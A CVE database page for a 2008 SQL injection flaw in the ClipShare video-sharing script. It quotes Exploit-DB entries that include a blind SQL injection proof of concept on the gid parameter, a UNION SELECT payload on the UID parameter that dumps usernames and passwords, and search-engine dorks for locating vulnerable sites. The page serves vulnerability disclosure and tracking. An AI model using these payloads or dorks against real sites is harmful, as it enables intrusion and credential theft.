CVE-2008-0089
published 2008-01-04CVE-2008-0089: SQL injection vulnerability in uprofile.php in ClipShare allows remote attackers to execute arbitrary SQL commands via the UID parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.6th percentile
SQL injection vulnerability in uprofile.php in ClipShare allows remote attackers to execute arbitrary SQL commands via the UID parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ClipShare 4.1.1 - Multiples Vulnerabilities
exploitdb·2013-03-27
CVE-2008-5489 ClipShare 4.1.1 - Multiples Vulnerabilities
ClipShare 4.1.1 - Multiples Vulnerabilities
---
# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013
# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
vuln file : gvideos.php , param : gid
Poc :
http://server/mavideo/gvideos.php?gid=1 [Blind]
#to exlploit this poc , must group to be added previously with some videos publics
Real exploitation :
http://server/mavideo/gvideos.php?gid=1 AND 1=1
==> return normal page
http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some e
Exploit-DB
ClipShare - 'UID' SQL Injection
exploitdb·2008-01-02
CVE-2008-0089 ClipShare - 'UID' SQL Injection
ClipShare - 'UID' SQL Injection
---
#########################################################################
video sharing www.clip-share.com Remote SQL Injection Exploit All Version
#########################################################################
AUTHOR :Krit webmaster of http://www.thaishadow.com
HOME : http://www.thaishadow.com
Download : http://www.clip-share.com/
###########################################################################
DorKs :inurl:/uprofile.php?UID=
or
"Powered by clipshare"
###########################################################################
## EXPLOIT :
http://server.com/Path/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+fr
http://osvdb.org/40077http://secunia.com/advisories/28313http://www.securityfocus.com/bid/27108https://exchange.xforce.ibmcloud.com/vulnerabilities/39364https://www.exploit-db.com/exploits/4830http://osvdb.org/40077http://secunia.com/advisories/28313http://www.securityfocus.com/bid/27108https://exchange.xforce.ibmcloud.com/vulnerabilities/39364https://www.exploit-db.com/exploits/4830
2008-01-04
Published